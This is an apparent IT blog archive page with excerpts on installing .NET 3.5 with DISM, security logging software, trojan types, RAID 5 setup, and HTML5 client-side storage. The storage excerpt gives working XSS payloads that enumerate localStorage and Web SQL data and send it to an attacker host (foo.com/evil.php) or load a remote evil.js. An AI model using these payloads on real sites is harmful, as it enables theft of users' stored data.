Month: November 2014

Enabling .Net Framework 3.5 in Windows Server 2012 using Command prompt

Enabling .Net Framework 3.5 in Windows Server 2012 using Command prompt  You need Media of Windows Server 2012 insert your media in your dvd drive or mound it via iLo or pendrive please not your drive letter which is assigned to that media now open up your command prompt press windows key and R key same time now run windows will appear  , now  type CMD  then press enter  this will open your command prompt now mound your drive letter in this case my drive letter is  ”  D   “ so i need to type D: in the command prompt now type following command dism /online /enable-feature /featurename:NetFx3 /All /Source:d:/sources/sxs Note*  in command line letter d may vary  now wait for some time done ! lets check on server manager restart your server  good...

Read More

Some Security Softwares

Most organizations use several types of network-basedand host-based : security software to detect malicious activity, protect systems and data, and support incident response efforts. Accordingly, security software is a major source of computer security log data. Common types of network-based and host-based security software include the following  Network Quarantine Servers : Some organizations check each remote host’s security posture before allowing it to join the network. This is often done through a network quarantine server and agents placed on each host. Hosts that do not respond to the server’s checks or that fail the checks are quarantined on a separate virtual local area network segment. Network quarantine servers log information about the status of checks, including which hosts were quarantined and for what reasons. Routers : Routers may be configured to permit or block certain types of network traffic based on a policy. Routers that block traffic are usually configured to log only the most basic characteristics of blocked activity. Web Proxies : Web proxies are intermediate hosts through which Web sites are accessed. Web proxies make Web page requests on behalf of users, and they cache copies of retrieved Web pages to make additional accesses to those pages more efficient. Web proxies can also be used to restrict Web access and to add a layer of protection between Web clients and Web servers. Web proxies often keep a record of all URLs accessed through them....

Read More

Network Threat : The Trojan Horse

What is a Trojan Horse ? A trojan horse is used to enter a victim’s computer, granting the attacker ‘wrapped’ into a program meaning that this program may therefore have hidden fuctions that you are not aware of.unrestricted access to the data stored on that computer and causing great damage to the victim. A trojan can be a hidden program that runs on your system  without your information, or it can be Different types of trojans : 1) FTP torjans : These trojans open an FTP server on the victim’s machine that might store and serve illegal software and/or sensitive data, and allow attackers to connect to your machine via FTP.2) Destructive trojans : The only function of these trojans is to destroy and delete files. This makes them very simple to use. They can automatically delete all the core system files on your machine. The trojan can either be activated by the attacker or can work like a logic bomb that starts on a specific day and time.A destructive trojan is a danger to any computer network. In many ways, it is similar to a virus, but thedestructive trojan has been created purposely to attack you, and therefore is unlikely to be detected by your antivirus software. 3) Proxy trojans : These trojans turn the victim’s computer into a proxy server, making it available to the whole world...

Read More

Configuring Raid 5 With 1 Hot Spare in HP Proliant ML310e Gen8

What is RAID 5 f A RAID 5 comprises block-level striping with distributed parity. Unlike in RAID 4, parity information is distributed among the drives. It requires that all drives but one be present to operate. Upon failure of a single drive, subsequent reads can be calculated from the distributed parity such that no data is lost. RAID 5 requires at least three disks.In comparison to RAID 4, RAID 5’s distributed parity evens out the stress of a dedicated parity disk among all RAID members. Additionally, read performance is increased since all RAID members participate in serving of the read requests. Diagram of a RAID 5 setup with distributed parity with each color representing the group of blocks in the respective parity block (a stripe). This diagram shows left asymmetric algorithm HOT SPARE A hot spare disk is a disk or group of disks used to automatically or manually, depending upon the hot spare policy, replace a failing or failed disk in a RAID configuration. The hot spare disk reduces the mean time to recovery (MTTR) for the RAID redundancy group, thus reducing the probability of a second disk failure and the resultant data loss that would occur in any singly redundant RAID (e.g., RAID-1, RAID-5, RAID-10). Typically, a hot spare is available to replace a number of different disks and systems employing a hot spare normally require a redundant group to allow time for the data to be generated onto the spare disk. During this time the system...

Read More

Client-side Storage using HTML5, really secure or just an abuse ?

HTML5 has introduced some new ways to save huge amount of data on the PC through the browser (use chromium or chrome to see how this work) Hakcers could steal or modify sensitive data online or offline. If a web application which uses this kind of storage ( client-side ) is vulnerable to XSS attacks we can use an attack payload to read or modify the content of known storage keys on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it. Working technique : ( 100% working technique, i got success while doing this, you just have to use your brain ) Storage Object Enumeration var ss = “”;for(i in window.sessionStorage){ss += i + ” “;}var ls = “”;for(i = 0; i < localStorage.length; i++) {ls += localStorage.key(i) + ” “; } Database Object Enumeration var db = “”;for(i in window){if(window[i] == “[object Database]”){db += i + “ “;}} Extracting Database Metadata SELECT name FROM sqlite_master WHERE type=’table’SELECT sql FROM sqlite_master WHERE name=’table_name’SELECT sqlite_version() One Shot Attack : http://blah_blah.com/page.php?name=<script>document.write(‘<imgsrc=”http://foo.com/ evil.php?name=’ %2B globalStorage[location.hostname].mykey %2B ‘”>’);</script> http://blah_blah.com/page.php?name=<script>db.transaction(function (tx) { tx.executeSql (“SELECT * FROM client_tb”, [], function(tx, result){ document.write(‘<img src=”http:// foo.com/evil.php?name=’ %2B result.rows.item(0)[‘col_data’] %2B ‘”>’); }); });</script> http://example.com/page.php?name=<script src=http://foo.com/evil.js></script> DefensesWebsite: Avoid saving sensitive data on the users...

Read More
  • 1
  • 2

Pin It on Pinterest